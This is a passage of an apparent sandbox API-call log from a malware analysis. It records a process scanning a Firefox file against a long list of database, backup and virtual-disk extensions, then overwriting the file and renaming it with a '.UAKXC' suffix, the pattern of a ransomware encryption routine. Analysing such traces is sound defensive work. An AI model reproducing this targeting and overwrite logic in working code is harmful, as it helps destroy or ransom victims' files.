Firefox\\crashreporter.ini", lpSrch=".accdc") returned 0x0 [0139.762] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".accde") returned 0x0 [0139.762] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".accdr") returned 0x0 [0139.762] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".accdt") returned 0x0 [0139.762] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".accft") returned 0x0 [0139.762] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".adb") returned 0x0 [0139.762] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".ade") returned 0x0 [0139.762] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".adf") returned 0x0 [0139.762] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".adp") returned 0x0 [0139.762] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".arc") returned 0x0 [0139.762] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".ora") returned 0x0 [0139.762] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".alf") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".ask") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".btr") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".bdf") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".cat") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".cdb") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".ckp") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".cma") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".cpd") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".dacpac") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".dad") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".dadiagrams") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".daschema") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".db") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".db-shm") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".db-wal") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".db3") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".dbc") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".dbf") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".dbs") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".dbt") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".dbv") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".dbx") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".dcb") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".dct") returned 0x0 [0139.763] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".dcx") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".ddl") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".dlis") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".dp1") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".dqy") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".dsk") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".dsn") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".dtsx") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".dxl") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".eco") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".ecx") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".edb") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".epim") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".exb") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".fcd") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".fdb") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".fic") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".fmp") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".fmp12") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".fmpsl") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".fol") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".fp3") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".fp4") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".fp5") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".fp7") returned 0x0 [0139.764] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".fpt") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".frm") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".gdb") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".grdb") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".gwi") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".hdb") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".his") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".ib") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".idb") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".ihx") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".itdb") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".itw") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".jet") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".jtx") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".kdb") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".kexi") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".kexic") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".kexis") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".lgc") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".lwx") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".maf") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".maq") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".mar") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".mas") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".mav") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".mdb") returned 0x0 [0139.765] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".mdf") returned 0x0 [0139.766] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".mpd") returned 0x0 [0139.766] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".mrg") returned 0x0 [0139.766] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".mud") returned 0x0 [0139.766] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".mwb") returned 0x0 [0139.766] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".myd") returned 0x0 [0139.766] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".ndf") returned 0x0 [0139.766] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".nnt") returned 0x0 [0139.766] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".nrmlib") returned 0x0 [0139.766] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".ns2") returned 0x0 [0139.766] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".ns3") returned 0x0 [0139.766] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".ns4") returned 0x0 [0139.766] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".nsf") returned 0x0 [0139.766] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".nv") returned 0x0 [0139.766] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".nv2") returned 0x0 [0139.766] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".nwdb") returned 0x0 [0139.766] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".nyf") returned 0x0 [0139.766] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".odb") returned 0x0 [0139.766] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".oqy") returned 0x0 [0139.766] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".orx") returned 0x0 [0139.766] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".owc") returned 0x0 [0139.766] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".p96") returned 0x0 [0139.766] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".p97") returned 0x0 [0139.766] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".pan") returned 0x0 [0139.767] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".pdb") returned 0x0 [0139.767] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".pdm") returned 0x0 [0139.767] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".pnz") returned 0x0 [0139.767] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".qry") returned 0x0 [0139.767] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".qvd") returned 0x0 [0139.767] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".rbf") returned 0x0 [0139.767] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".rctd") returned 0x0 [0139.767] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".rod") returned 0x0 [0139.767] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".rodx") returned 0x0 [0139.767] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".rpd") returned 0x0 [0139.767] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".rsd") returned 0x0 [0139.767] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".sas7bdat") returned 0x0 [0139.767] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".sbf") returned 0x0 [0139.767] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".scx") returned 0x0 [0139.767] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".sdb") returned 0x0 [0139.767] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".sdc") returned 0x0 [0139.767] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".sdf") returned 0x0 [0139.767] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".sis") returned 0x0 [0139.767] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".spq") returned 0x0 [0139.767] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".sql") returned 0x0 [0139.767] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".sqlite") returned 0x0 [0139.767] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".sqlite3") returned 0x0 [0139.767] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".sqlitedb") returned 0x0 [0139.767] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".te") returned 0x0 [0139.768] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".temx") returned 0x0 [0139.768] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".tmd") returned 0x0 [0139.768] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".tps") returned 0x0 [0139.768] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".trc") returned 0x0 [0139.768] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".trm") returned 0x0 [0139.768] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".udb") returned 0x0 [0139.768] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".udl") returned 0x0 [0139.768] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".usr") returned 0x0 [0139.768] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".v12") returned 0x0 [0139.768] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".vis") returned 0x0 [0139.768] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".vpd") returned 0x0 [0139.768] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".vvv") returned 0x0 [0139.768] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".wdb") returned 0x0 [0139.768] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".wmdb") returned 0x0 [0139.768] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".wrk") returned 0x0 [0139.768] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".xdb") returned 0x0 [0139.768] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".xld") returned 0x0 [0139.768] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".xmlff") returned 0x0 [0139.768] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".abcddb") returned 0x0 [0139.768] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".abs") returned 0x0 [0139.768] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".abx") returned 0x0 [0139.768] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".accdw") returned 0x0 [0139.768] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".adn") returned 0x0 [0139.768] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".db2") returned 0x0 [0139.769] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".fm5") returned 0x0 [0139.769] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".hjt") returned 0x0 [0139.769] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".icg") returned 0x0 [0139.769] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".icr") returned 0x0 [0139.769] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".kdb") returned 0x0 [0139.769] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".lut") returned 0x0 [0139.769] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".maw") returned 0x0 [0139.769] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".mdn") returned 0x0 [0139.769] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".mdt") returned 0x0 [0139.769] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".vdi") returned 0x0 [0139.769] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".vhd") returned 0x0 [0139.769] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".vmdk") returned 0x0 [0139.769] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".pvm") returned 0x0 [0139.769] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".vmem") returned 0x0 [0139.769] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".vmsn") returned 0x0 [0139.769] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".vmsd") returned 0x0 [0139.769] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".nvram") returned 0x0 [0139.769] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".vmx") returned 0x0 [0139.769] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".raw") returned 0x0 [0139.769] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".qcow2") returned 0x0 [0139.769] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".subvol") returned 0x0 [0139.769] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".bin") returned 0x0 [0139.770] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".vsv") returned 0x0 [0139.770] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".avhd") returned 0x0 [0139.770] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".vmrs") returned 0x0 [0139.770] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".vhdx") returned 0x0 [0139.770] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".avdx") returned 0x0 [0139.770] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".vmcx") returned 0x0 [0139.770] StrStrIW (lpFirst="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpSrch=".iso") returned 0x0 [0139.770] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.770] WriteFile (in: hFile=0x6c4, lpBuffer=0x397fd70*, nNumberOfBytesToWrite=0x20c, lpNumberOfBytesWritten=0x397fc78, lpOverlapped=0x0 | out: lpBuffer=0x397fd70*, lpNumberOfBytesWritten=0x397fc78*=0x20c, lpOverlapped=0x0) returned 1 [0139.792] WriteFile (in: hFile=0x6c4, lpBuffer=0x397fc80*, nNumberOfBytesToWrite=0xa, lpNumberOfBytesWritten=0x397fc7c, lpOverlapped=0x0 | out: lpBuffer=0x397fc80*, lpNumberOfBytesWritten=0x397fc7c*=0xa, lpOverlapped=0x0) returned 1 [0139.792] SetEndOfFile (hFile=0x6c4) returned 1 [0139.792] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0139.792] ReadFile (in: hFile=0x6c4, lpBuffer=0x4b20000, nNumberOfBytesToRead=0xfa3, lpNumberOfBytesRead=0x397fc88, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesRead=0x397fc88*=0xfa3, lpOverlapped=0x0) returned 1 [0139.793] SetFilePointerEx (in: hFile=0x6c4, liDistanceToMove=0xfffff05d, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0139.793] WriteFile (in: hFile=0x6c4, lpBuffer=0x4b20000*, nNumberOfBytesToWrite=0xfa3, lpNumberOfBytesWritten=0x397fc44, lpOverlapped=0x0 | out: lpBuffer=0x4b20000*, lpNumberOfBytesWritten=0x397fc44*=0xfa3, lpOverlapped=0x0) returned 1 [0139.793] CloseHandle (hObject=0x6c4) returned 1 [0139.802] GetProcessHeap () returned 0xea0000 [0139.802] RtlAllocateHeap (HeapHandle=0xea0000, Flags=0x8, Size=0x7fd7) returned 0xef04c8 [0139.803] lstrcpyW (in: lpString1=0xef04c8, lpString2="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini") returned="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini" [0139.803] lstrcatW (in: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini", lpString2=".UAKXC" | out: lpString1="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini.UAKXC") returned="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini.UAKXC" [0139.803] MoveFileW (lpExistingFileName="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini" (normalized: "c:\\program files (x86)\\mozilla firefox\\crashreporter.ini"), lpNewFileName="C:\\Program Files (x86)\\Mozilla Firefox\\crashreporter.ini.UAKXC" (normalized: "c:\\program files (x86)\\mozilla firefox\\crashreporter.ini.uakxc")) returned 1 [0139.804] GetProcessHeap () returned 0xea0000 [0139.804] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xef04c8 | out: hHeap=0xea0000) returned 1 [0139.804] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xedd988 | out: hHeap=0xea0000) returned 1 [0139.804] HeapFree (in: hHeap=0xea0000, dwFlags=0x0, lpMem=0xeecec8 | out: 